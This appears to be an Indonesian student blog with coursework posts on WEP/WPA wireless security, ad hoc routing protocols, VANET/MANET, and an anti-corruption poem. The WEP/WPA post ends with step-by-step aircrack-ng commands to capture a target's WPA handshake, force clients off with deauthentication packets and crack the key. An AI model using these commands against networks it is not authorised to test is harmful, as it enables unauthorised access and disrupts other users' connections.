WEP (Wired Equivalent Privacy)

Suatu metoda pengamanan jaringan nirkabel atau wireless. WEP merupakan standart keamanan dan enkripsi pertama yang digunakan oleh wireless. Enkripsi WEP menggunakan kunci yang dimasukkan oleh administrator ke client maupun access point, kunci tersebut harus cocok dari yang diberikan access point ke client, dengan yang di masukkan client untuk authentifikasi menuju access point.

Cara memberikan password pada WEP terdiridari 64 bit dan 128 bit dengan menggunakan format karakter Hexxadecimal dan ASCII.

Jumlah karakter yang diberikan pada WEP:

-64 bit Hexadecimal terdiri dari 8 karakter ( angka 0-9 dan huruf A-F)

-64 bit ASCII terdiri dari 5 karakter (seluruh karakter yang ada di keyboard)

-128 bit Hexadecimal terdiri dari 16 karakter (angka 0-9 danhuruf A-F)

-128 bit ASCII terdiri dari 10 karakter (seluruhkarakter yang ada di keyboard)

WEP dianggap mudah ditembus dengan metode sederhana sehingga perlu adanya enkripsi yang lebih kuat.

WEP adalah security untuk wireless yang agak lama. Jenis security ini mudah untuk dicrack atau di sadap orang luar.

WPA (Wi-Fi Protected Access)

Suatu sistem yang juga dapat diterapkan untuk mengamankan jaringan nirkabel.

Metoda pengamanan dengan WPA ini diciptakan untuk melengkapi dari sistem yamg sebelumnya, yaitu WEP. Para peneliti menemukan banyak celah dan kelemahan pada infrastruktur nirkabel yang menggunakan metoda pengamanan WEP. Sebagai pengganti dari sistem WEP, WPA mengimplementasikan layer dari IEEE, yaitu layer 802.11i.

Nantinya WPA akan lebih banyak digunakan pada implementasi keamanan jaringan nirkabel. WPA didesain dan digunakan dengan alat tambahan lainnya, yaitu sebuah komputer pribadi (PC).

Pengamanan jaringan nirkabel dengan metoda WPA, dapat ditandai dengan minimal ada tiga pilihan yang harus diisi administrator jaringan agar jaringan dapat beroperasi pada mode WPA

a. Server

Komputer server yang dituju oleh akses point yang akan memberi otontikasi kepada client. beberapa perangkat lunak yang biasa digunakan antara lain freeRADIUS, openRADIUS dan lain-lain.

b. Port

Nomor port yang digunakan adalah 1812.

c. Shared Secret

Shared Secret adalah kunci yang akan dibagikan ke komputer dan juga kepada client secara transparant.

Wi-Fi Protected Access II (WPA II)

WPA2 adalah sertifikasi produk yang tersedia melalui Wi-Fi Alliance. WPA2 hanya menyatakan peralatan nirkabel yang kompatibel dengan standar IEEE 802.11i. WPA2 merupakan sertifikasi produk yang secara resmi menggantikan Wired Equivalent Privacy (WEP) dan fitur keamanan lain yang asli standar IEEE 802.11. Tujuan dari sertifikasi WPA2 ini adalah untuk mendukung tambahan fitur keamanan standar IEEE 802.11i yang sudah termasuk produk-produk yang mendukung WPA.

WPA-PSK (Wi-Fi Protected Access – Pre Shared Key)

Pengamanan jaringan nirkabel dengan menggunakan metoda WPA-PSK jika tidak ada authentikasi server yang digunakan. Dengan demikian access point dapat dijalankan dengan mode WPA tanpa menggunakan bantuan komputer lain sebagai server. Cara mengkonfigurasikannya juga cukup sederhana. Perlu diketahui bahwa tidak semua access point akan mempunyai fasilitas yang sama dan tidak semua access point menggunakan cara yang sama dalam mendapatkan Shared-Key yang akan dibagikan ke client.

Prinsip kerja yang digunakan WPA-PSK sangat mirip dengan pengamanan jaringan nirkabel dengan menggunakan metoda Shared-Key.

Cracking WPA/WPA2-PSK

1. Install dan update Aircrack-ng

sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev

$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc1.tar.gz -O – | tar -xz

$ cd aircrack-ng-1.2-rc1

$ sudo make

$ sudo make install

2. Start Wireless interface

$ sudo airmon-ng check kill

$ sudo airmon-ng start wlan0

(monitor mode enabled on mon0)

3. Start Airodump-ng to Collect Authentication Handshake

$ sudo airodump-ng mon0

$ sudo airodump-ng -c 1 –bssid F6:55:F9:69:1F:32 -w WPAcrack mon0 –ignore-negative-one

*keterangan : F6:55:F9:69:1F:32 merupakan mac target

$ sudo aireplay-ng –deauth 100 -a F6:55:F9:69:1F:32 mon0 –ignore-negative-one

4. Run Aircrack-ng to Crack WPA/WPA2-PSK

$ aircrack-ng -w WPAcrack -b F6:55:F9:69:1F:32 WPAcrack.cap

Sumber:

http://id.wikipedia.org/wiki/Wi-Fi_Protected_Access

http://www.webopedia.com/DidYouKnow/Computer_Science/WEP_WPA_wireless_security.asp

http://www.shellhacks.com/en/Crack-Wi-Fi-with-WPA-WPA2-PSK-using-Aircrack-ng

Uncategorized

Routing Protocol

February 19, 2015 irvandpm Leave a comment

Destination-Sequenced Distance Vector (DSDV)

DSDV merupakan salah satu protokol proaktif yang menjaga informasi dari topologi global dalam bentuk tabel pada setiap node. tabel-tabel ini di update secara berkala untuk menjaga kekonsistenan dan keakurasian informasi keadaan jaringan.

DSDV merupakan versi lebih baik dari algoritma BEllman-Ford dimana setiap node menjaga sebuah tabel yang berisi jarak terpendek dan node pertama pada jarak terpendek dari setiap node lainnya yang berada di dalam jaringan. DSDV menyatukan update tabel dengan meningkatnya urutan nomor untuk mmencegah looping, untuk melawan masalah menghitung yang tak terbatas, dan untuk mempercepat pertemuan pada satu titik.

DSDV memiliki kelebihan :
– DSDV adalah protokol yang efisien untuk pencarian rute
– Latensi untuk penemuan rute sangat rendah
– DSDV menjamin jalur bebas loop
Kekurangan DSDV sendiri yaitu :
– DSDV perlu mengirim banyak pesan kontrol untuk menjaga topologi jaringan pada setiap node
– Akibat dari terlalu sering mengirim pesan, menghasilkan volume lalu lintas yang tinggi untuk jaringan yang padat dan sangat mobile
– Perhatian khusus harus diambil untuk mengurangi jumlah pesan kontrol

Dynamic Source Routing (DSR)
DSR adalah protokol dimana node sumber yang menentukan rute paket yang dikirim setelah mengetahui serangkaian rute yang lengkap. Proses routing pada protokol ini terdiri atas 2 mekanisme yaitu Route Discovery dan Route Maintenance. Route discovery
yaitu node ingin mengirimkan paket data ke tujuan yang belum diketahui rutenya. Sehingga sumber mengirim route request (RREQ). RREQ akan melakukan proses flooding yaitu proses pengiriman data atau control message ke setiap node pada jaringan untuk mencari rute ke tujuan. RREQ akan menyebar ke seluruh node dalam jaringan. Tiap node akan mengirim paket RREQ ke node lain kecuali node tujuan. Kemudian node-node yang menerima RREQ akan mengirim paket route reply (RREP) ke node yang mengirim
RREQ tadi. Setelah rute ditemukan node sumber mulai mengirim paket data.
Sedang Route Maintenance yaitu mekanisme dimana sumber mendeteksi adanya perubahan topologi jaringan sehingga pengiriman paket mengalami kongesti. Hal ini disebabkan karena salah satu node yang terdaftar dalam rute sebelumnya bergerak menjauh dari range node yang lain. Saat route maintenance mendeteksi masalah pada rute yang ada, paket route error (RERR) akan dikirim pada node pengirim. Saat RERR diterima, hop ke node yang menjauh akan dihilangkan dari route cache. Kemudian rute lain yang masih tersimpan di cache akan digunakan. Jika tidak ada
rute lagi maka protokol DSR akan melakukan proses route discovery lagi untuk menemukan rute baru.

Keuntungan penggunaan DSR ini adalah intermediate node tidak perlu memelihara secara up to date informasi routing pada saat melewatkan paket, karena setiap paket selalu berisi informasi routing di dalam headernya. Routing jenis ini juga menghilangkan juga proses periodic route advertisement dan neighbor detection yang dijalankan oleh routing ad hoc lainnya. Dibandingkan dengan on demand routing lainnya DSR memiliki kinerja yang paling baik
dalam hal throughput, routing overhead (pada paket) dan rata-rata panjang path, akan tetapi DSR memiliki delay waktu yang buruk bagi proses untuk pencarian route baru. Kerugian dari routing ini adalah mekanisme route maintenance tidak dapat memperbaiki link yang rusak atau down. Penggunaan routing ini akan sangat optimal pada jumlah node yang kecil atau kurang dari 200 node. Untuk jumlah yang lebih besar akan mengakibatkan collision antar paket dan menyebabkan bertambahnya delay waktu pada saat akan membangun koneksi baru.

ZRP
Zone routing protocol merupakan hybrid proactive/reactive routing protocol. Pada satu sisi ZRP membatasi jangkauan prosedur proaktif hanya untuk node lokal tetangga saja. Sisi lainnya pencarian atau trace pada jaringan diadopsi ketika device tidak dapat mencari tujuan (destination) dalam jangkauan proactive routing. ZRP terdiri dari dua prosedur, IntrAzone Routing Protocol (IARP) dan IntErzone Routing Protocol (IERP) . IARP digunakan di dalam zona routing, dan EIRP digunakan saat jarak antara sumber (source) dan tujuan (destination) lebih lebar daripada radius zona routing. Setiap device harus menjaga informasi routing dari seluruh device di dalam zona routing, dan memperbarui informasi ketika topologi berubah. Ketika jarak menuju destination lebih pendek daripada zona radius, destination dapat ditemukan oleh IARP berdasarkan informasi routing pada setiap device. Akan tetapi, jika destination berada di luar zona, IERP akan bergantung pada broadcasting sebuah route request untuk mencari atau menemukan destination. Setiap device yang menerima route request akan selalu mengulangi prosedur yang sama sampai destination ditemukan. Melalui hybrid ractive routing dan proactive routing, ZRP dapat mengkontrol sisa penyimpanan dari informasi routing dan jumlah broadcasting. Meskipun banyak ad hoc routing protocol telah banyak diulas, namun tidak begitu cocok bagi bluetooth scatternets, dimana terdiri dari dua atau lebih piconets.

Tugas Nirkabel

Infrastructureless (VANET dan MANET)

January 28, 2015 irvandpm Leave a comment

VANET (Vehicular Ad-hoc NETworks)

Vanet merupakan sebuah jaringan terorganisir yang dibentuk dengan menghubungkan kendaraan dan RSU (Roadside Unit) disebut Vehicular Ad Hoc Network (VANET), dan RSU lebih lanjut terhubung ke jaringan backbone berkecepatan tinggi melalui koneksi jaringan

Vanet sendiri termasuk dalam jaringan komunikasi nirkabel dan merupakan turunan dari MANET (Mobile Ad hoc Network).

Tujuan dasar VANET adalah untuk mendukung komunikasi antar kendaraan sehingga dapat digunakan sebagai sistem informasi trafik lalu lintas yang cerdas. RSU di dalam Vanet dapat memberikan bantuan dalam menemukan fasilitas seperti restoran dan pompa bensin, dan membroadcast pesan yang terkait seperti pemberitahuan untuk memberikan pengendara informasi.

Sebagai salah satu contoh :

Sebuah kendaraan dapat berkomunikasi dengan lampu lalu lintas cahaya melalui V2I komunikasi, dan lampu lalu lintas dapat menunjukkan ke kendaraan ketika keadaan lampu ke kuning atau merah.

dengan menggunakan vanet maka para pengendara akan sangat terbantu ketika sedang berkendara dalam kondisi cuaca musim penghujan atau di sedang berada di daerah asing. dengan vanet juga kecelakaan lalu lintas akan berkurang.

Kelebihan Teknologi Vanet

1. Mengurangi Resiko Kecelakaan

2. Mengurangi Kemacetan

3. Memberikan Kenyamanan Berkendara

4. Mampu berkomunikasi antara pengendara

MANET (Mobile Ad hoc Network)

Sebuah jaringan wireless dari mobile-mobile node yang terhubung satu sama lain namun tidak memiliki router fisik.

Node-node dalam jaringan ini berfungsi sebagai router yang bertanggungjawab untuk mencari dan menghandle rute ke setiap note dalam jaringan.

Jika jaringan Manet ini ingin terhubung ke suatu jaringan yang memiliki router fisik, maka harus melewati gateway tertentu terlebih dahulu.

Karakretistik dari Manet :

1. Konfigurasi jaringan dinamis

Dapat berpindah kemana saja. Topologi jaringan yang bentuknya adalah lompatan antara hop ke hop dapat berubah secara dinamis dan terjadi terus menerus tanpa ada ketetapan waktu untuk berpindah.

2. Keterbatasan daya untuk tiap operasi

Semua node pada Manet bersifat mobile, sehingga dapat dipastikan node tersebut menggunakan baterai untuk beroperasi. Sehingga perlu perancangan untun optimalisasi energi

3. Bandwith yang terbatas

Link pada jaringan wireless cenderung memiliki kapasitas yang rendah jika dibandingkan jaringan wired. Efek yang terjadi pada jaringan seperti ini adalah congestion (kemacetan)

4. Keterbatasan keamanan

Jaringan wireless seperti ini rentan terhadap serangan pada keamanannya. Dapat terjadi serangan seperti eavesdroping, spoofing, dan denial of service, sehingga perlu waspada.

Arsitektur Protokol Manet

Dalam jaringan Manet, mobile node menggunakan ad hoc protokol routing untuk merutekan paket-paketnya.

Layer jaringan Manet terbagi menjadi dua, yaitu layer network dan layer ad hoc routing.

Protokol pada network layer adalah Internet Protokol (IP), sedangkan pada ad hoc routing layer adalah Ad Hoc On-Demand Distance Vector (AODV). Protokol routing ad hoc yang lain pun bisa digunakan pada lapisan ini.

Layer transportnya menggunakan User Datagram Protokol (UDP). Karena karakter yang dimiliki UDP yaitu toleran terhadap loss dan tidak toleran terhadap delay.

Pengiriman paket tidak memerlukan paket balasan untuk pengecekan terkirimnya data. Meskipun begitu, UDP memiliki keunggulan yaitu lebih efektif dalam penggunaan bandwidth, karena mampu meneruskan paket ke jalur lain apabila terjadi suatu kemacetan pengiriman paket.

Sebagai salah satu contoh:

Untuk melakukan komunikasi data file transfer kita dapat menggunakan media File Transfer Protocol (FTP). Dengan jaringan MANET sistem komunikasi yang dilakukan tidak membutuhkan infrastruktur jaringan karena tiap node pada jaringan tersebut bersifat mobile sehingga bisa berpindah pindah. FTP berjalan pada protokol TCP/IP dengan menggunakan 2 koneksi TCP. Koneksi pertama adalah control channel yang digunakan untuk menukar intruksi dan bersifat selalu terbuka koneksi dan koneksi yang satunya lagi adalah data channel yang digunakan untuk file transfer.

File yang dikirim disini bisa berupa dokumen,gambar,audio,video,dll.

Referensi :

Click to access 8-Arifin-Journal.pdf

ies.pens.ac.id/prosiding/download.php?id=658

http://en.wikipedia.org/wiki/Mobile_ad_hoc_network

https://www.ietf.org/rfc/rfc2501.txt

https://www.academia.edu/7985470/Penerapan_Teknologi_Jaringan_Mobile_Ad-hoc_Network_MANET_Untuk_File_Transfer

– Nama kelompok : Perine

– Anggota kelompok:

1. Reynaldo LHP 1103120136

2. M. Arifino S 1103120137

3. Dony Salman A 1103120144

5. Irvan Dwi P M 1103120154

Uncategorized

Puisi Anti Korupsi – Berawal dari diri

November 17, 2014 irvandpm Leave a comment

Korupsi..

Ya, korupsi..

Dimana-mana kau ada.

Apakah kau sebuah virus?

Virus yang merasuki beberapa orang untuk memakan hak orang lain.

Hai pemuda..

Lihatlah keindahan negara kita.

Cukup indah bukan?

Tapi tidak di indahkan lagi karena terlalu banyak orang-orang yang tidak berlaku jujur.

Orang-orang yg seolah-olah menguasai dunia dengan memakan hak orang lain.

Tidak..!!

Katakan tidak untuk korupsi..!!

Dia adalah virus jahat yang mengancam kita.

Wahai pemuda..

Jadikan kejujuran sebagai pondasimu membangun negara.

Jadikan kecerdasan dan kebijaksanaan sebagai peganganmu mengembangkan negara.

Dan jadikan keberanian sebagai alatmu membela negara.

Kuatlah hai pemuda..

Sama-sama kita mempertahankan keindahan negara ini dengan berlaku jujur.

Agar negara ini stabil, makmur dan sejahtera.

Uncategorized

Hello world!

November 16, 2014 irvandpm 1 Comment

Welcome to Telkom University Student Blog. This is your first post. Edit or delete it, then start blogging!

irvandpm's blog

WEP dan WPA

Routing Protocol

Infrastructureless (VANET dan MANET)

Puisi Anti Korupsi – Berawal dari diri

Hello world!

Just another Telkom University Student Blog site